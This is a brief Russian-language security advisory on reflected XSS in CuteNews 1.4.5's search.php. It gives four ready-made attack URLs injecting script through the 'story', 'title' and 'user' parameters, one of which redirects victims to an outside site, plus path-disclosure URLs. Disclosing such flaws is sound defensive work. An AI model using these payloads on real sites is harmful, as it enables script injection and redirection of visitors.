Программа: CuteNews 1.4.5 и более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"story", "title" и "user" в сценарии search.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный код сценария в
браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

search.php?dosearch=yes&story=%22%3E%3Cscript%3Ealert%28%22NST
+PoC+by+K4P0%22%29%3B%3C%2Fscript%3E&title=&user=&from_date_day=&from_date_month=&from_date_year=&
to_date_day=&to_date_month=&to_date_year=

search.php?dosearch=yes&title=%22%3E%3Cscript%3Ealert(
%22NST%20PoC%20by%20K4P0%22 );%3C/script%3E&user= &from_date_day=&from_date_month=&from_date_year=
&to_date_day =&to_date_month=&to_date_year=

search.php?dosearch=yes&story=K4P0&user=%22%3E%3Cscript%3
Ealert(%22NST%20PoC%20by%20K4P0%22);%3C/script%3E&from_date_day= &from_date_month=&from_date_year=&to_date_day=&to_date_month=
&to_date_year=

search.php?dosearch=yes&title="><script>window.location=
‘http://www.neosecurityteam.net/’;</script>&user=&from_date_day= &from_date_month=&from_date_year=&to_date_day=&to_date_month=
&to_date_year=

Раскрытие пути:

www.victim.com/cutenews/inc/show.inc.php
www.victim.com/cutenews/inc/functions.inc.php



Оставить мнение